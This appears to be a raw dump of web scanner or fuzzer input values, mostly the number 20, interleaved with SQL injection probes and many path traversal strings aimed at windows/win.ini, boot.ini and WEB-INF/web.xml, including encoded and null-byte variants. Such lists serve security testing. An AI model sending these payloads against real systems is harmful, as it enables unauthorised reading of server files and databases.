20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

0

0

0

0

0

0

0

0

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

0

20

20

20

20

20

20

20

20

20

20

20

20

20

-1" OR 2+533-533-1=0+0+0+1 --

20

1

20

20

-1 OR 2+235-235-1=0+0+0+1

20

-1 OR 2+18-18-1=0+0+0+1 --

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

1

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

20

WEB-INFweb.xml

20

20

WEB-INF/web.xml

20

20

(select convert(int,CHAR(65)))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

20

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

20

JyI=

/.\./.\./.\./.\./.\./.\./windows/win.ini

20_9007

@@37fRP

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1

................windowswin.ini

20

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

../../../../../../../../../../windows/win.ini%00.jpg

20

../../../../../../../../../../boot.ini

20

../../../../../../../../../../windows/win.ini

20

WEB-INFweb.xml

20

20

/WEB-INF/web.xml

20